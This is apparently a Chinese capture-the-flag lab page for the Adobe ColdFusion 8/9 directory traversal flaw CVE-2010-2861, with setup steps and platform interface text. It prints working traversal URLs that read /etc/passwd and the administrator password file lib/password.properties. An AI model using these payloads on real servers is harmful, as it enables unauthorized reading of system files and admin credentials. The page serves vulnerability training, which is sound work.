Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言

Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。

环境启动可能需要1~5分钟，启动后，访问http://ip:port/CFIDE/administrator/enter.cfm，可以看到初始化页面，输入密码admin，开始初始化整个环境。

漏洞复现

直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en，即可读取文件/etc/passwd：

读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en：

作者

snow

解题次数

一血

暂无

消耗金币

分数

100

最高奖励

创建题目环境

提交

您尚未登录，请登录或注册后评论

0 人参与 | 0 条评论

创建题目

竞赛列表

创建比赛

题目

解题

分数

金币